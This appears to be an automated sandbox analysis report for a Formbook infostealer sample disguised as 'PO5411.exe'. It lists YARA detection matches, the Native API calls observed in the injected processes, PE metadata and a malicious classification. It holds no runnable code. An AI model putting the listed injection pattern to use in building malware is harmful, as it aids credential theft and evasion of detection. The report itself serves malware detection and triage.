                      Source: 00000001.00000002.789244532.00000000038F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 00000001.00000002.789244532.00000000038F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000001.00000002.789816893.00000000039F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 00000001.00000002.789816893.00000000039F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000011.00000002.849831780.00000000010B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 00000011.00000002.849831780.00000000010B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000001.00000003.776623532.0000000003A8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 00000001.00000003.776623532.0000000003A8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000015.00000002.912991547.0000000001150000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 00000015.00000002.912991547.0000000001150000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000015.00000002.912181333.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 00000015.00000002.912181333.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 17.2.PO5411.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 17.2.PO5411.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 1.2.PO5411.exe.38f1990.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 1.2.PO5411.exe.38f1990.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 17.2.PO5411.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 17.2.PO5411.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_004181B0 NtCreateFile,17_2_004181B0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_00418260 NtReadFile,17_2_00418260
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_004182E0 NtClose,17_2_004182E0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_00418390 NtAllocateVirtualMemory,17_2_00418390
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_004181AA NtCreateFile,17_2_004181AA
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0041825D NtReadFile,17_2_0041825D
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_004182DC NtClose,17_2_004182DC
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0041838A NtAllocateVirtualMemory,17_2_0041838A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_01259910
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012599A0 NtCreateSection,LdrInitializeThunk,17_2_012599A0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259860 NtQuerySystemInformation,LdrInitializeThunk,17_2_01259860
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259840 NtDelayExecution,LdrInitializeThunk,17_2_01259840
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012598F0 NtReadVirtualMemory,LdrInitializeThunk,17_2_012598F0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259A20 NtResumeThread,LdrInitializeThunk,17_2_01259A20
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259A00 NtProtectVirtualMemory,LdrInitializeThunk,17_2_01259A00
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259A50 NtCreateFile,LdrInitializeThunk,17_2_01259A50
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259540 NtReadFile,LdrInitializeThunk,17_2_01259540
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012595D0 NtClose,LdrInitializeThunk,17_2_012595D0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259710 NtQueryInformationToken,LdrInitializeThunk,17_2_01259710
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012597A0 NtUnmapViewOfSection,LdrInitializeThunk,17_2_012597A0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259780 NtMapViewOfSection,LdrInitializeThunk,17_2_01259780
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259FE0 NtCreateMutant,LdrInitializeThunk,17_2_01259FE0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_01259660
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012596E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_012596E0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259950 NtQueueApcThread,17_2_01259950
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012599D0 NtCreateProcessEx,17_2_012599D0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259820 NtEnumerateKey,17_2_01259820
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0125B040 NtSuspendThread,17_2_0125B040
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012598A0 NtWriteVirtualMemory,17_2_012598A0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259B00 NtSetValueKey,17_2_01259B00
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0125A3B0 NtGetContextThread,17_2_0125A3B0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259A10 NtQuerySection,17_2_01259A10
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259A80 NtOpenDirectoryObject,17_2_01259A80
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259520 NtWaitForSingleObject,17_2_01259520
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0125AD30 NtSetContextThread,17_2_0125AD30
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259560 NtWriteFile,17_2_01259560
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012595F0 NtQueryInformationFile,17_2_012595F0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259730 NtQueryVirtualMemory,17_2_01259730
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0125A710 NtOpenProcessToken,17_2_0125A710
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259760 NtOpenProcess,17_2_01259760
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0125A770 NtOpenThread,17_2_0125A770
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259770 NtSetInformationFile,17_2_01259770
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259610 NtEnumerateValueKey,17_2_01259610
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259670 NtQueryInformationProcess,17_2_01259670
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01259650 NtQueryValueKey,17_2_01259650
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012596D0 NtCreateKey,17_2_012596D0
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011F6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,21_2_011F6D90
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011FB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,21_2_011FB5E0
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011DB42E NtOpenThreadToken,NtOpenProcessToken,NtClose,21_2_011DB42E
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011D84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,21_2_011D84BE
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011D58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,21_2_011D58A4
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011DB4C0 NtQueryInformationToken,21_2_011DB4C0
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011DB4F8 NtQueryInformationToken,NtQueryInformationToken,21_2_011DB4F8
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011D83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,21_2_011D83F2
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011F9AB4 NtSetInformationFile,21_2_011F9AB4
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011E6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,21_2_011E6550
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011E374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,21_2_011E374E
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_027ACC941_2_027ACC94
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_027AF0D81_2_027AF0D8
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_027AF0C81_2_027AF0C8
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_073866891_2_07386689
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_07381DB21_2_07381DB2
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_073875E01_2_073875E0
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_07380BDA1_2_07380BDA
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_07381AA01_2_07381AA0
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_07380F6C1_2_07380F6C
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_073876871_2_07387687
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_07382EE01_2_07382EE0
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_07382ED01_2_07382ED0
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_073866D21_2_073866D2
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_073875D01_2_073875D0
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_07381B411_2_07381B41
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_07386AAD1_2_07386AAD
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0040103017_2_00401030
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0041C09A17_2_0041C09A
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0041C11917_2_0041C119
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_00408C4B17_2_00408C4B
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_00408C5017_2_00408C50
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0041B49617_2_0041B496
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_00402D8817_2_00402D88
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_00402D9017_2_00402D90
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0041C7F817_2_0041C7F8
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_00402FB017_2_00402FB0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0123412017_2_01234120
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0121F90017_2_0121F900
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012D100217_2_012D1002
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012420A017_2_012420A0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E20A817_2_012E20A8
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122B09017_2_0122B090
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E28EC17_2_012E28EC
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E2B2817_2_012E2B28
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124EBB017_2_0124EBB0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012DDBD217_2_012DDBD2
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E22AE17_2_012E22AE
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01210D2017_2_01210D20
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E2D0717_2_012E2D07
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E1D5517_2_012E1D55
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0124258117_2_01242581
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122D5E017_2_0122D5E0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E25DD17_2_012E25DD
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122841F17_2_0122841F
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012DD46617_2_012DD466
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E1FF117_2_012E1FF1
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01236E3017_2_01236E30
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012DD61617_2_012DD616
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_012E2EF717_2_012E2EF7
                      Source: C:\Windows\explorer.exeCode function: 18_2_04DCE2FF18_2_04DCE2FF
                      Source: C:\Windows\explorer.exeCode function: 18_2_04DCB8F918_2_04DCB8F9
                      Source: C:\Windows\explorer.exeCode function: 18_2_04DD006218_2_04DD0062
                      Source: C:\Windows\explorer.exeCode function: 18_2_04DD17C718_2_04DD17C7
                      Source: C:\Windows\explorer.exeCode function: 18_2_04DD25B218_2_04DD25B2
                      Source: C:\Windows\explorer.exeCode function: 18_2_04DCC36218_2_04DCC362
                      Source: C:\Windows\explorer.exeCode function: 18_2_04DCB90218_2_04DCB902
                      Source: C:\Windows\explorer.exeCode function: 18_2_04DCE30218_2_04DCE302
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011F5D0A21_2_011F5D0A
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011F350621_2_011F3506
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011E655021_2_011E6550
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011E196921_2_011E1969
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011D719021_2_011D7190
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011F31DC21_2_011F31DC
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011DE04021_2_011DE040
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011D9CF021_2_011D9CF0
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011D48E621_2_011D48E6
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011DCB4821_2_011DCB48
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011E5FC821_2_011E5FC8
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011F6FF021_2_011F6FF0
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011DFA3021_2_011DFA30
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011D522621_2_011D5226
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011D5E7021_2_011D5E70
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011D8AD721_2_011D8AD7
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: String function: 0121B150 appears 35 times
                      Source: PO5411.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: PO5411.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: PO5411.exeBinary or memory string: OriginalFilename vs PO5411.exe
                      Source: PO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClassLibrary1.dll< vs PO5411.exe
                      Source: PO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs PO5411.exe
                      Source: PO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKukchphs.dll" vs PO5411.exe
                      Source: PO5411.exe, 00000001.00000003.775725054.00000000070E1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameGjflivyin.exe. vs PO5411.exe
                      Source: PO5411.exeBinary or memory string: OriginalFilename vs PO5411.exe
                      Source: PO5411.exe, 00000011.00000002.851780300.000000000149F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO5411.exe
                      Source: PO5411.exe, 00000011.00000002.850136521.000000000117D000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs PO5411.exe
                      Source: PO5411.exeBinary or memory string: OriginalFilenameGjflivyin.exe. vs PO5411.exe
                      Source: PO5411.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: 00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000001.00000002.788482651.00000000028F6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 00000001.00000002.788482651.00000000028F6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000015.00000002.912382912.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 00000015.00000002.912382912.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000001.00000002.789244532.00000000038F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 00000001.00000002.789244532.00000000038F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000001.00000002.789816893.00000000039F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 00000001.00000002.789816893.00000000039F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000011.00000002.849831780.00000000010B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 00000011.00000002.849831780.00000000010B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000001.00000003.776623532.0000000003A8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 00000001.00000003.776623532.0000000003A8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000015.00000002.912991547.0000000001150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 00000015.00000002.912991547.0000000001150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000015.00000002.912181333.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 00000015.00000002.912181333.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 17.2.PO5411.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 17.2.PO5411.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 1.2.PO5411.exe.38f1990.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 1.2.PO5411.exe.38f1990.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: 17.2.PO5411.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                      Source: 17.2.PO5411.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                      Source: PO5411.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: PO5411.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@10/8@4/1
